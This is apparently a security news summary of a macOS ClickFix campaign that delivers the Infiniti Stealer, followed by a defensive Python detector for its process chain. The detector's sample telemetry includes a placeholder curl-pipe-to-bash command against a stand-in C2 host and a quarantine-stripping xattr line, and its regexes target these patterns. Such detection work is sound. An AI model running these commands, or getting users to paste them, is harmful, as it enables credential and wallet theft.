
"The attack starts with a fake CAPTCHA page that serves a legitimate-looking Cloudflare human verification page asking visitors to paste and execute a command in Terminal."
"Once the victim runs the command, a Bash script is fetched from a remote server. The script decodes an embedded payload, writes the second stage binary to a temporary folder, removes its quarantine flag, and executes it."
"The binary dropped by the script is a loader compiled using Nuitka. The compiler transforms Python code into a native binary, making static analysis more difficult."
"The Python-based information stealer targets browser credentials, Keychain information, cryptocurrency wallets, secrets stored in developer files, and screenshots captured during execution."
A new ClickFix campaign targets macOS users with a fake Cloudflare verification page that tricks them into executing malicious commands. The attack begins with a CAPTCHA page that instructs users to run a command in Terminal. This command fetches a Bash script from a remote server, which executes a loader compiled with Nuitka. The loader launches the Infiniti Stealer malware, which steals browser credentials, Keychain information, and cryptocurrency wallets, sending the data to a command-and-control server via HTTP POST requests.
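The chain summarised above (a Terminal command that pipes a remote script into a shell, strips the quarantine attribute from a dropped file, and then runs that file from a temporary folder) is sequential enough to be detected from process telemetry. The detector below is an added example and is not code from the SecurityWeek article, from the campaign, or from any EDR product; it assumes a constructed feed of process-creation events (pid, parent pid, parent name, command line), and the hostname `EXAMPLE-C2.invalid` and the paths in the sample events are placeholders, not indicators from the page.

```python
"""Flag ClickFix-style macOS chains in process-creation telemetry.

Stages looked for, in the order the article describes them:
  1. a Terminal-spawned shell that fetches a remote script and pipes it to a shell
  2. a descendant process that strips com.apple.quarantine with xattr
  3. a descendant process executed from a temporary directory
Event format and sample data below are constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: int            # seconds since epoch (constructed values)
    pid: int
    ppid: int
    parent_name: str   # name of the parent process as the sensor reports it
    cmdline: str


# Stage 1: curl/wget output piped straight into sh/bash/zsh.
FETCH_PIPE_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(/bin/)?(ba|z)?sh\b")
# Stage 2: removal of the Gatekeeper quarantine attribute.
QUARANTINE_STRIP = re.compile(r"\bxattr\b.*\s-d\s+com\.apple\.quarantine\b")
# Stage 3: the executable path itself lives in a temp location.
TEMP_DIR_EXEC = re.compile(r"^(/private)?/tmp/|^(/private)?/var/folders/")
TERMINALS = {"Terminal", "iTerm2"}   # assumed parent names for an interactive shell


def descendants(root_pid, events):
    """Return the set of pids in the process tree rooted at root_pid (root included)."""
    kids = {}
    for e in events:
        kids.setdefault(e.ppid, []).append(e.pid)
    seen, stack = {root_pid}, [root_pid]
    while stack:
        for child in kids.get(stack.pop(), []):
            if child not in seen:
                seen.add(child)
                stack.append(child)
    return seen


def find_clickfix_chains(events, window=300):
    """Return one finding per Terminal-launched fetch-and-pipe command.

    Severity is 'high' when the quarantine strip and temp-dir execution are
    also seen in that command's process tree within `window` seconds.
    """
    findings = []
    for root in events:
        if root.parent_name not in TERMINALS or not FETCH_PIPE_SHELL.search(root.cmdline):
            continue
        tree = descendants(root.pid, events)
        stages = ["fetch_pipe_to_shell"]
        for e in events:
            if e.pid not in tree or not (root.ts <= e.ts <= root.ts + window):
                continue
            exe = (e.cmdline.split() or [""])[0]
            if QUARANTINE_STRIP.search(e.cmdline) and "quarantine_strip" not in stages:
                stages.append("quarantine_strip")
            elif TEMP_DIR_EXEC.search(exe) and "temp_dir_exec" not in stages:
                stages.append("temp_dir_exec")
        severity = "high" if len(stages) == 3 else "medium"
        findings.append({"root_pid": root.pid, "stages": stages, "severity": severity})
    return findings


# Constructed sample telemetry: one malicious chain plus benign Terminal activity,
# including a manual xattr call that must NOT be flagged on its own.
SAMPLE_EVENTS = [
    ProcEvent(1000, 501, 400, "Terminal",
              "/bin/bash -c 'curl -fsSL https://EXAMPLE-C2.invalid/v.sh | bash'"),
    ProcEvent(1001, 502, 501, "bash", "/bin/bash /dev/stdin"),
    ProcEvent(1002, 503, 502, "bash", "xattr -d com.apple.quarantine /tmp/.x/loader"),
    ProcEvent(1003, 504, 502, "bash", "/tmp/.x/loader"),
    ProcEvent(2000, 600, 400, "Terminal", "ls -la"),
    ProcEvent(2001, 601, 400, "Terminal",
              "xattr -d com.apple.quarantine /Users/dev/Downloads/tool.app"),
]

if __name__ == "__main__":
    for finding in find_clickfix_chains(SAMPLE_EVENTS):
        print(finding)
```

The rule deliberately keys on the full sequence rather than on any single command: developers strip quarantine attributes by hand, and `curl ... | sh` installers are common, so either alone is a weak signal. Anchoring on a Terminal-spawned fetch-and-pipe and then requiring the later stages inside that command's process tree is what keeps the false-positive rate tolerable.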
Read at SecurityWeek